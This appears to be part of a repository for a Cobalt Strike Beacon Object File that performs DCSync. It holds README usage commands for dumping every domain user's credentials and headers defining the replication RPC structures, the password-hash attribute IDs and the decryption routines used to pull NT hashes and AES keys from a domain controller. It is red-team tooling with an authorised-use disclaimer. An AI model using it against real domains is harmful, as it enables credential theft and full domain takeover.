Dump all users from the domain:
```sh
dcsync all
```

Target a specific domain controller:
```sh
dcsync all -dc dc01.corp.local
```

## Credits

This project builds upon research and code from:
- [DCSyncer](https://github.com/notsoshant/DCSyncer)
- [DCsyncer Write-up](https://www.notsoshant.io/tools/dcsyncer/)
- [Mimikatz](https://github.com/gentilkiwi/mimikatz)

## Authors Note

Mimikatz and similar programs parse supplemental credentials for offsets, then map to a struct to extract AES keys. This project identifies the salt then uses heuristic detection to locate and extract the AES keys. There will always be edge cases where this approach won't work, however I have yet to encounter a case like that in testing. I have also run into situations where accounts didn't actually have any supplemental credentials, so if you do encounter such an edge case I ask that you test with a different tool, such as impacket's secretsdump, before creating an issue. At the very least it should always return the nthash of the target user.

## Disclaimer

For Authorized Use Only - Unauthorized access to computer systems is illegal. This tool should only be used in environments where you have explicit permission to conduct security testing.


================================================
FILE: AD-BOF/DCSync-BOF/_include/beacon.h
================================================
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.
 *
 * Additional BOF resources are available here:
 *   - https://github.com/Cobalt-Strike/bof_template
 *
 * Cobalt Strike 4.x
 * ChangeLog:
 *    1/25/2022: updated for 4.5
 *    7/18/2023: Added BeaconInformation API for 4.9
 *    7/31/2023: Added Key/Value store APIs for 4.9
 *                  BeaconAddValue, BeaconGetValue, and BeaconRemoveValue
 *    8/31/2023: Added Data store APIs for 4.9
 *                  BeaconDataStoreGetItem, BeaconDataStoreProtectItem,
 *                  BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries
 *    9/01/2023: Added BeaconGetCustomUserData API for 4.9
 *    3/21/2024: Updated BeaconInformation API for 4.10 to return a BOOL
 *               Updated the BEACON_INFO data structure to add new parameters
 *    4/19/2024: Added BeaconGetSyscallInformation API for 4.10
 *    4/25/2024: Added APIs to call Beacon's system call implementation
 *    12/18/2024: Updated BeaconGetSyscallInformation API for 4.11 (Breaking changes)
 *    2/13/2025: Updated SYSCALL_API structure with more ntAPIs for 4.11
 *    3/20/2025: Updated ALLOCATED_MEMORY_SECTION structure with driploader page size for 4.12
 *    4/7/2025: Updated ALLOCATED_MEMORY_REGION structure with driploader allocation granularity for 4.12
 *    7/16/2025: Updated ALLOCATED_MEMORY_PURPOSE structure with PURPOSE_UDC2_MEMORY for 4.12
 */
#ifndef _BEACON_H_
#define _BEACON_H_
#include <windows.h>

#ifdef __cplusplus
extern "C" {
#endif // __cplusplus

/* data API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);

/* format API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, const char * text, int len);
DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, const char * fmt, ...);
DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);

/* Output Functions */
#define CALLBACK_OUTPUT      0x0
#define CALLBACK_OUTPUT_OEM  0x1e
#define CALLBACK_OUTPUT_UTF8 0x20
#define CALLBACK_ERROR       0x0d
#define CALLBACK_CUSTOM      0x1000
#define CALLBACK_CUSTOM_LAST 0x13ff


DECLSPEC_IMPORT void   BeaconOutput(int type, const char * data, int len);
DECLSPEC_IMPORT void   BeaconPrintf(int type, const char * fmt, ...);
DECLSPEC_IMPORT BOOL   BeaconDownload(const char * filename, const char* buffer, unsigned int length);


/* Token Functions */
DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void   BeaconRevertToken();
DECLSPEC_IMPORT BOOL   BeaconIsAdmin();

/* Spawn+Inject Functions */
DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

/* Beacon Information */
/*
 *  ptr  - pointer to the base address of the allocated memory.
 *  size - the number of bytes allocated for the ptr.
 */
typedef struct {
	char * ptr;
	size_t size;
} HEAP_RECORD;
#define MASK_SIZE 13

/* Information the user can set in the USER_DATA via a UDRL */
typedef enum {
	PURPOSE_EMPTY,
	PURPOSE_GENERIC_BUFFER,
	PURPOSE_BEACON_MEMORY,
	PURPOSE_SLEEPMASK_MEMORY,
	PURPOSE_BOF_MEMORY,
	PURPOSE_UDC2_MEMORY,
	PURPOSE_USER_DEFINED_MEMORY = 1000
} ALLOCATED_MEMORY_PURPOSE;

typedef enum {
	LABEL_EMPTY,
	LABEL_BUFFER,
	LABEL_PEHEADER,
	LABEL_TEXT,
	LABEL_RDATA,
	LABEL_DATA,
	LABEL_PDATA,
	LABEL_RELOC,
	LABEL_USER_DEFINED = 1000
} ALLOCATED_MEMORY_LABEL;

typedef enum {
	METHOD_UNKNOWN,
	METHOD_VIRTUALALLOC,
	METHOD_HEAPALLOC,
	METHOD_MODULESTOMP,
	METHOD_NTMAPVIEW,
	METHOD_USER_DEFINED = 1000,
} ALLOCATED_MEMORY_ALLOCATION_METHOD;

/**
* This structure allows the user to provide additional information
* about the allocated heap for cleanup. It is mandatory to provide
* the HeapHandle but the DestroyHeap Boolean can be used to indicate
* whether the clean up code should destroy the heap or simply free the pages.
* This is useful in situations where a loader allocates memory in the
* processes current heap.
*/
typedef struct _HEAPALLOC_INFO {
	PVOID HeapHandle;
	BOOL  DestroyHeap;
} HEAPALLOC_INFO, *PHEAPALLOC_INFO;

typedef struct _MODULESTOMP_INFO {
	HMODULE ModuleHandle;
} MODULESTOMP_INFO, *PMODULESTOMP_INFO;

typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION {
	HEAPALLOC_INFO HeapAllocInfo;
	MODULESTOMP_INFO ModuleStompInfo;
	PVOID Custom;
} ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION;

typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION {
	BOOL Cleanup;
	ALLOCATED_MEMORY_ALLOCATION_METHOD AllocationMethod;
	ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION AdditionalCleanupInformation;
} ALLOCATED_MEMORY_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_CLEANUP_INFORMATION;

typedef struct _ALLOCATED_MEMORY_SECTION {
	ALLOCATED_MEMORY_LABEL Label; // A label to simplify Sleepmask development
	PVOID  BaseAddress;           // Pointer to virtual address of section
	SIZE_T VirtualSize;           // Virtual size of the section
	DWORD  CurrentProtect;        // Current memory protection of the section
	DWORD  PreviousProtect;       // The previous memory protection of the section (prior to masking/unmasking)
	BOOL   MaskSection;           // A boolean to indicate whether the section should be masked
	DWORD  DripLoadPageSize;      // The page size used when committing memory during drip-loading
} ALLOCATED_MEMORY_SECTION, *PALLOCATED_MEMORY_SECTION;

typedef struct _ALLOCATED_MEMORY_REGION {
	ALLOCATED_MEMORY_PURPOSE Purpose;      // A label to indicate the purpose of the allocated memory
	PVOID  AllocationBase;                 // The base address of the allocated memory block
	SIZE_T RegionSize;                     // The size of the allocated memory block
	DWORD Type;                            // The type of memory allocated
	DWORD DripLoadAllocationGranularity;   // The allocation granularity used when reserving memory for drip-loading
	ALLOCATED_MEMORY_SECTION Sections[8];  // An array of section information structures
	ALLOCATED_MEMORY_CLEANUP_INFORMATION CleanupInformation; // Information required to cleanup the allocation
} ALLOCATED_MEMORY_REGION, *PALLOCATED_MEMORY_REGION;

typedef struct {
	ALLOCATED_MEMORY_REGION AllocatedMemoryRegions[6];
} ALLOCATED_MEMORY, *PALLOCATED_MEMORY;

/*
 *  version               - The version of the beacon dll was added for release 4.10
 *                          version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch
 *                          e.g. 0x040900 -> CS 4.9
 *                               0x041000 -> CS 4.10
 *
 *  sleep_mask_ptr        - pointer to the sleep mask base address
 *  sleep_mask_text_size  - the sleep mask text section size
 *  sleep_mask_total_size - the sleep mask total memory size
 *
 *  beacon_ptr   - pointer to beacon's base address
 *                 The stage.obfuscate flag affects this value when using CS default loader.
 *                    true:  beacon_ptr = allocated_buffer - 0x1000 (Not a valid address)
 *                    false: beacon_ptr = allocated_buffer (A valid address)
 *                 For a UDRL the beacon_ptr will be set to the 1st argument to DllMain
 *                 when the 2nd argument is set to DLL_PROCESS_ATTACH.
 *  heap_records - list of memory addresses on the heap beacon wants to mask.
 *                 The list is terminated by the HEAP_RECORD.ptr set to NULL.
 *  mask         - the mask that beacon randomly generated to apply
 *
 *  Added in version 4.10
 *  allocatedMemory - An ALLOCATED_MEMORY structure that can be set in the USER_DATA
 *                     via a UDRL.
 */
typedef struct {
	unsigned int version;
	char  * sleep_mask_ptr;
	DWORD   sleep_mask_text_size;
	DWORD   sleep_mask_total_size;

	char  * beacon_ptr;
	HEAP_RECORD * heap_records;
	char    mask[MASK_SIZE];

	ALLOCATED_MEMORY allocatedMemory;
} BEACON_INFO, *PBEACON_INFO;

DECLSPEC_IMPORT BOOL   BeaconInformation(PBEACON_INFO info);

/* Key/Value store functions
 *    These functions are used to associate a key to a memory address and save
 *    that information into beacon.  These memory addresses can then be
 *    retrieved in a subsequent execution of a BOF.
 *
 *    key - the key will be converted to a hash which is used to locate the
 *          memory address.
 *
 *    ptr - a memory address to save.
 *
 * Considerations:
 *    - The contents at the memory address is not masked by beacon.
 *    - The contents at the memory address is not released by beacon.
 *
 */
DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr);
DECLSPEC_IMPORT void * BeaconGetValue(const char * key);
DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key);

/* Beacon Data Store functions
 *    These functions are used to access items in Beacon's Data Store.
 *    BeaconDataStoreGetItem returns NULL if the index does not exist.
 *
 *    The contents are masked by default, and BOFs must unprotect the entry
 *    before accessing the data buffer. BOFs must also protect the entry
 *    after the data is not used anymore.
 *
 */

#define DATA_STORE_TYPE_EMPTY 0
#define DATA_STORE_TYPE_GENERAL_FILE 1

typedef struct {
	int type;
	DWORD64 hash;
	BOOL masked;
	char* buffer;
	size_t length;
} DATA_STORE_OBJECT, *PDATA_STORE_OBJECT;

DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index);
DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index);
DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries();

/* Beacon User Data functions */
DECLSPEC_IMPORT char * BeaconGetCustomUserData();

/* Beacon System call */
/* Syscalls API */
typedef struct
{
	PVOID fnAddr;
	PVOID jmpAddr;
	DWORD sysnum;
} SYSCALL_API_ENTRY, *PSYSCALL_API_ENTRY;

typedef struct
{
	SYSCALL_API_ENTRY ntAllocateVirtualMemory;
	SYSCALL_API_ENTRY ntProtectVirtualMemory;
	SYSCALL_API_ENTRY ntFreeVirtualMemory;
	SYSCALL_API_ENTRY ntGetContextThread;
	SYSCALL_API_ENTRY ntSetContextThread;
	SYSCALL_API_ENTRY ntResumeThread;
	SYSCALL_API_ENTRY ntCreateThreadEx;
	SYSCALL_API_ENTRY ntOpenProcess;
	SYSCALL_API_ENTRY ntOpenThread;
	SYSCALL_API_ENTRY ntClose;
	SYSCALL_API_ENTRY ntCreateSection;
	SYSCALL_API_ENTRY ntMapViewOfSection;
	SYSCALL_API_ENTRY ntUnmapViewOfSection;
	SYSCALL_API_ENTRY ntQueryVirtualMemory;
	SYSCALL_API_ENTRY ntDuplicateObject;
	SYSCALL_API_ENTRY ntReadVirtualMemory;
	SYSCALL_API_ENTRY ntWriteVirtualMemory;
	SYSCALL_API_ENTRY ntReadFile;
	SYSCALL_API_ENTRY ntWriteFile;
	SYSCALL_API_ENTRY ntCreateFile;
	SYSCALL_API_ENTRY ntQueueApcThread;
	SYSCALL_API_ENTRY ntCreateProcess;
	SYSCALL_API_ENTRY ntOpenProcessToken;
	SYSCALL_API_ENTRY ntTestAlert;
	SYSCALL_API_ENTRY ntSuspendProcess;
	SYSCALL_API_ENTRY ntResumeProcess;
	SYSCALL_API_ENTRY ntQuerySystemInformation;
	SYSCALL_API_ENTRY ntQueryDirectoryFile;
	SYSCALL_API_ENTRY ntSetInformationProcess;
	SYSCALL_API_ENTRY ntSetInformationThread;
	SYSCALL_API_ENTRY ntQueryInformationProcess;
	SYSCALL_API_ENTRY ntQueryInformationThread;
	SYSCALL_API_ENTRY ntOpenSection;
	SYSCALL_API_ENTRY ntAdjustPrivilegesToken;
	SYSCALL_API_ENTRY ntDeviceIoControlFile;
	SYSCALL_API_ENTRY ntWaitForMultipleObjects;
} SYSCALL_API, *PSYSCALL_API;

/* Additional Run Time Library (RTL) addresses used to support system calls.
 * If they are not set then system calls that require them will fall back
 * to the Standard Windows API.
 *
 * Required to support the following system calls:
 *    ntCreateFile
 */
typedef struct
{
	PVOID rtlDosPathNameToNtPathNameUWithStatusAddr;
	PVOID rtlFreeHeapAddr;
	PVOID rtlGetProcessHeapAddr;
} RTL_API, *PRTL_API;

/* Updated in version 4.11 to use the entire structure instead of pointers to the structure.
 * This allows for retrieving a copy of the information which would be under the BOF's
 * control instead of a reference pointer which may be obfuscated when beacon is sleeping.
 */
typedef struct
{
	SYSCALL_API syscalls;
	RTL_API     rtls;
} BEACON_SYSCALLS, *PBEACON_SYSCALLS;

/* Updated in version 4.11 to include the size of the info pointer, which equals sizeof(BEACON_SYSCALLS) */
DECLSPEC_IMPORT BOOL BeaconGetSyscallInformation(PBEACON_SYSCALLS info, SIZE_T infoSize, BOOL resolveIfNotInitialized);

/* Beacon System call functions which will use the current system call method */
DECLSPEC_IMPORT LPVOID BeaconVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT LPVOID BeaconVirtualAllocEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualProtectEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
DECLSPEC_IMPORT BOOL BeaconVirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
DECLSPEC_IMPORT BOOL BeaconGetThreadContext(HANDLE threadHandle, PCONTEXT threadContext);
DECLSPEC_IMPORT BOOL BeaconSetThreadContext(HANDLE threadHandle, PCONTEXT threadContext);
DECLSPEC_IMPORT DWORD BeaconResumeThread(HANDLE threadHandle);
DECLSPEC_IMPORT HANDLE BeaconOpenProcess(DWORD desiredAccess, BOOL inheritHandle, DWORD processId);
DECLSPEC_IMPORT HANDLE BeaconOpenThread(DWORD desiredAccess, BOOL inheritHandle, DWORD threadId);
DECLSPEC_IMPORT BOOL BeaconCloseHandle(HANDLE object);
DECLSPEC_IMPORT BOOL BeaconUnmapViewOfFile(LPCVOID baseAddress);
DECLSPEC_IMPORT SIZE_T BeaconVirtualQuery(LPCVOID address, PMEMORY_BASIC_INFORMATION buffer, SIZE_T length);
DECLSPEC_IMPORT BOOL BeaconDuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions);
DECLSPEC_IMPORT BOOL BeaconReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
DECLSPEC_IMPORT BOOL BeaconWriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);

/* Beacon Gate APIs */
DECLSPEC_IMPORT VOID BeaconDisableBeaconGate();
DECLSPEC_IMPORT VOID BeaconEnableBeaconGate();

DECLSPEC_IMPORT VOID BeaconDisableBeaconGateMasking();
DECLSPEC_IMPORT VOID BeaconEnableBeaconGateMasking();

/* Beacon User Data
 *
 * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch
 * e.g. 0x040900 -> CS 4.9
 *      0x041000 -> CS 4.10
*/

#define DLL_BEACON_USER_DATA 0x0d
#define BEACON_USER_DATA_CUSTOM_SIZE 32
typedef struct
{
	unsigned int version;
	PSYSCALL_API syscalls;
	char         custom[BEACON_USER_DATA_CUSTOM_SIZE];
	PRTL_API     rtls;
	PALLOCATED_MEMORY allocatedMemory;
} USER_DATA, * PUSER_DATA;

#ifdef __cplusplus
}
#endif // __cplusplus
#endif // _BEACON_H_


================================================
FILE: AD-BOF/DCSync-BOF/_include/dcsync.h
================================================
/*
 * DCSync BOF - Common Header
 * 
 * Shared type definitions, constants, and function declarations
 * for the DCSync Beacon Object File implementation.
 */

#ifndef DCSYNC_H
#define DCSYNC_H

#include <windows.h>
#include <rpc.h>
#include <wincrypt.h>

// ============================================================================
// Debug Output Macros
// ============================================================================

// Optional debug output (disable with -DNDEBUG for smaller binary)
#ifndef NDEBUG
#define DEBUG_PRINT(level, ...) BeaconPrintf(level, __VA_ARGS__)
#else
#define DEBUG_PRINT(level, ...) do { } while(0)
#endif

// Always print errors and critical output
#define OUTPUT_PRINT(...) BeaconPrintf(CALLBACK_OUTPUT, __VA_ARGS__)
#define ERROR_PRINT(...) BeaconPrintf(CALLBACK_ERROR, __VA_ARGS__)

// ============================================================================
// DRSUAPI Type Definitions
// ============================================================================

typedef LONGLONG DSTIME;
typedef void *DRS_HANDLE;

typedef struct {
    unsigned char Data[28];
} NT4SID;

typedef struct {
    unsigned long structLen;
    unsigned long SidLen;
    GUID Guid;
    NT4SID Sid;
    unsigned long NameLen;
    WCHAR StringName[1];
} DSNAME;

typedef LONGLONG USN;

typedef struct {
    USN usnHighObjUpdate;
    USN usnReserved;
    USN usnHighPropUpdate;
} USN_VECTOR;

typedef struct {
    UUID uuidDsa;
    USN usnHighPropUpdate;
} UPTODATE_CURSOR_V1;

typedef struct {
    DWORD dwVersion;
    DWORD dwReserved1;
    DWORD cNumCursors;
    DWORD dwReserved2;
    UPTODATE_CURSOR_V1 rgCursors[1];
} UPTODATE_VECTOR_V1_EXT;

typedef struct {
    unsigned int length;
    BYTE *elements;
} OID_t;

typedef struct {
    unsigned long ndx;
    OID_t prefix;
} PrefixTableEntry;

typedef struct {
    DWORD PrefixCount;
    PrefixTableEntry *pPrefixEntry;
} SCHEMA_PREFIX_TABLE;

typedef ULONG ATTRTYP;

typedef struct {
    DWORD dwVersion;
    DWORD dwReserved1;
    DWORD cAttrs;
    ATTRTYP rgPartialAttr[1];
} PARTIAL_ATTR_VECTOR_V1_EXT;

typedef struct {
    ULONG valLen;
    UCHAR *pVal;
} ATTRVAL;

typedef struct {
    ULONG valCount;
    ATTRVAL *pAVal;
} ATTRVALBLOCK;

typedef struct {
    ATTRTYP attrTyp;
    ATTRVALBLOCK AttrVal;
} ATTR;

typedef struct {
    ULONG attrCount;
    ATTR *pAttr;
} ATTRBLOCK;

typedef struct {
    DSNAME *pObject;
    ULONG fIsDefunct;
    ATTRBLOCK AttrBlock;
} ENTINF;

typedef struct REPLENTINFLIST {
    struct REPLENTINFLIST *pNextEntInf;
    ENTINF Entinf;
    BOOL fIsNCPrefix;
    UUID uuidDsaOrgPg;
    USN_VECTOR UsnPropUpd;
    DWORD __pad;
} REPLENTINFLIST;

// DRS Extensions  
typedef struct {
    DWORD cb;
    BYTE rgb[1];
} DRS_EXTENSIONS;

typedef struct {
    DWORD cb;
    DWORD dwFlags;
    GUID SiteObjGuid;
    DWORD Pid;
    DWORD dwReplEpoch;
} DRS_EXTENSIONS_INT;

// V8 Request
typedef struct {
    UUID uuidDsaObjDest;
    UUID uuidInvocIdSrc;
    DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    UPTODATE_VECTOR_V1_EXT *pUpToDateVecDest;
    ULONG ulFlags;
    ULONG cMaxObjects;
    ULONG cMaxBytes;
    ULONG ulExtendedOp;
    LONGLONG liFsmoInfo;
    PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
    PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
    SCHEMA_PREFIX_TABLE PrefixTableDest;
} DRS_MSG_GETCHGREQ_V8;

// V10 Request (adds dwReservedUSN1, dwReservedUSN2, pUpToDateVecDestV2, dwReplicaHigh, dwReplicaLow, dwReservedUSN3)
typedef struct {
    UUID uuidDsaObjDest;
    UUID uuidInvocIdSrc;
    DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    UPTODATE_VECTOR_V1_EXT *pUpToDateVecDest;
    ULONG ulFlags;
    ULONG cMaxObjects;
    ULONG cMaxBytes;
    ULONG ulExtendedOp;
    ULARGE_INTEGER liFsmoInfo;
    PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
    PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
    SCHEMA_PREFIX_TABLE PrefixTableDest;
} DRS_MSG_GETCHGREQ_V10;

// V1 Reply
typedef struct {
    UUID uuidDsaObjSrc;
    UUID uuidInvocIdSrc;
    DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    USN_VECTOR usnvecTo;
    UPTODATE_VECTOR_V1_EXT *pUpToDateVecSrcV1;
    SCHEMA_PREFIX_TABLE PrefixTableSrc;
    ULONG ulExtendedRet;
    ULONG cNumObjects;
    ULONG cNumBytes;
    REPLENTINFLIST *pObjects;
    BOOL fMoreData;
} DRS_MSG_GETCHGREPLY_V1;

// V6 Reply
typedef struct {
    UUID uuidDsaObjSrc;
    UUID uuidInvocIdSrc;
    DSNAME *pNC;
    USN_VECTOR usnvecFrom;
    USN_VECTOR usnvecTo;
    UPTODATE_VECTOR_V1_EXT *pUpToDateVecSrc;
    SCHEMA_PREFIX_TABLE PrefixTableSrc;
    ULONG ulExtendedRet;
    ULONG cNumObjects;
    ULONG cNumBytes;
    REPLENTINFLIST *pObjects;
    BOOL fMoreData;
    ULONG cNumNcSizeObjects;
    ULONG cNumNcSizeValues;
    DWORD cNumValues;
    void *rgValues;
    DWORD dwDRSError;
} DRS_MSG_GETCHGREPLY_V6;

typedef union {
    DRS_MSG_GETCHGREQ_V8 V8;
    DRS_MSG_GETCHGREQ_V10 V10;
} DRS_MSG_GETCHGREQ;

typedef union {
    DRS_MSG_GETCHGREPLY_V1 V1;
    DRS_MSG_GETCHGREPLY_V6 V6;
} DRS_MSG_GETCHGREPLY;

// ============================================================================
// RPC & Security Type Definitions
// ============================================================================

#ifndef __RPCNDR_H__
typedef union _CLIENT_CALL_RETURN {
    void *Pointer;
    LONG_PTR Simple;
} CLIENT_CALL_RETURN;
#endif

typedef struct _SecHandle {
    ULONG_PTR dwLower;
    ULONG_PTR dwUpper;
} SecHandle;

typedef SecHandle CtxtHandle;
typedef SecHandle *PSecHandle;
typedef PSecHandle PCtxtHandle;

typedef struct _SecPkgContext_SessionKey {
    ULONG SessionKeyLength;
    PBYTE SessionKey;
} SecPkgContext_SessionKey;

typedef struct _ENCRYPTED_PAYLOAD {
    BYTE Salt[16];
    DWORD CheckSum;
    BYTE EncryptedData[1];  // Variable length
} ENCRYPTED_PAYLOAD, *PENCRYPTED_PAYLOAD;



// ============================================================================
// Constants & Definitions
// ============================================================================

// Code page
#define CP_ACP 0

// RPC Security
#define RPC_C_AUTHN_LEVEL_PKT_PRIVACY 6
#define RPC_C_AUTHN_GSS_NEGOTIATE 9
#define SECPKG_ATTR_SESSION_KEY 9
#define RPC_C_OPT_SECURITY_CALLBACK 10

// DRS Extended Operations
#define EXOP_REPL_OBJ 6
#define EXOP_REPL_SECRETS 3

// DRS Flags
#define DRS_INIT_SYNC                    0x00000001
#define DRS_WRIT_REP                     0x00000010
#define DRS_NEVER_SYNCED                 0x00000020
#define DRS_FULL_SYNC_NOW                0x00000200
#define DRS_SYNC_URGENT                  0x00008000
#define DRS_GET_ANC                      0x00000008
#define DRS_GET_NC_SIZE                  0x00001000
#define DRS_SPECIAL_SECRET_PROCESSING    0x00000004

// Attribute Types
#define ATT_UNICODE_PWD          0x9005A
#define ATT_NT_PWD_HISTORY       0x9005E
#define ATT_LM_PWD_HISTORY       0x900A0
#define ATT_SUPPLEMENTAL_CREDS   0x9007D
#define ATT_SAM_ACCOUNT_NAME     0x900DD
#define ATT_SAM_ACCOUNT_TYPE     0x9012E
#define ATT_USER_PRINCIPAL_NAME  0x90290
#define ATT_OBJECT_SID           0x90092
#define ATT_PEK_LIST             0x90481

// Crypto Constants
#define PROV_RSA_AES 24
#define PROV_RSA_FULL 1
#define PLAINTEXTKEYBLOB 0x8
// CALG_DES is already defined in wincrypt.h

// Status Codes
#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#endif
#ifndef STATUS_BUFFER_TOO_SMALL
#define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L)
#endif

// Kerberos
#define MICROSOFT_KERBEROS_NAME_A "Kerberos"
#define KERB_ETYPE_RC4_HMAC_MD5 23

// sAMAccountType values for account type detection
#define SAM_USER_OBJECT        0x30000000  // Normal user account
#define SAM_MACHINE_ACCOUNT    0x30000001  // Computer/workstation account
#define SAM_TRUST_ACCOUNT      0x30000002  // Trust account

// ============================================================================
// Function Declarations
// ============================================================================

// DRSUAPI Functions (from RPC stub)
ULONG IDL_DRSBind(
    RPC_BINDING_HANDLE hDrs,
    UUID *puuidClientDsa,
    DRS_EXTENSIONS_INT *pextClient,
    DRS_EXTENSIONS_INT **ppextServer,
    DRS_HANDLE *phDrs);

ULONG IDL_DRSUnbind(DRS_HANDLE *phDrs);

ULONG IDL_DRSGetNCChanges(
    DRS_HANDLE hDrs,
    DWORD dwInVersion,
    DRS_MSG_GETCHGREQ *pmsgIn,
    DWORD *pdwOutVersion,
    DRS_MSG_GETCHGREPLY *pmsgOut);

// Utility Functions
void BytesToHex(const BYTE* bytes, DWORD len, char* output);
DWORD GetRIDFromSID(const BYTE* sid, DWORD sidLen);

// Crypto Functions
BOOL DecryptRC4(const BYTE* encData, DWORD encLen, const BYTE* key, BYTE* output);
BOOL DecryptRC4WithRawKey(const BYTE* encData, DWORD encLen, const BYTE* key, DWORD keyLen, BYTE* output);
BOOL DecryptDESWithRid(const BYTE* encData, DWORD rid, BYTE* output);
BOOL DecryptWithSessionKey(
    const BYTE* encryptedData,
    DWORD encryptedLen,
    const BYTE* sessionKey,
    DWORD sessionKeyLen,
    BYTE* output,
    DWORD* outputLen);

// RPC Functions
RPC_BINDING_HANDLE CreateDRSBinding(const char* dcHostname);
void RPC_ENTRY RpcSecurityCallback(void *Context);

// DSNAME Functions
DSNAME* BuildDSName(const char* dn, const GUID* guid);

// Utility Functions
void InitDRSRequest(DRS_MSG_GETCHGREQ* request, const GUID* dcGuid, DSNAME* targetDsname);

// Processing Functions
void ProcessCredentials(REPLENTINFLIST* objects, const char* samAccountName, const char* distinguishedName, const char* dcHostname, const BYTE* sessionKey, DWORD sessionKeyLen, int onlyNT);

// ============================================================================
// Shared DECLSPEC Imports
// ============================================================================

// MSVCRT Functions
DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(char* buffer, size_t count, const char* format, ...);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void* dest, int c, size_t count);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(void* dest, const void* src, size_t count);
DECLSPEC_IMPORT size_t __cdecl MSVCRT$strlen(const char* str);
DECLSPEC_IMPORT char* __cdecl MSVCRT$strcat(char* dest, const char* src);
DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t size);
DECLSPEC_IMPORT void __cdecl MSVCRT$free(void* ptr);

// Kernel32 Functions
DECLSPEC_IMPORT void __cdecl KERNEL32$Sleep(unsigned int milliseconds);

// RPC Functions
DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY RPCRT4$RpcStringBindingComposeA(
    unsigned char* ObjUuid,
    unsigned char* ProtSeq,
    unsigned char* NetworkAddr,
    unsigned char* Endpoint,
    unsigned char* Options,
    unsigned char** StringBinding);

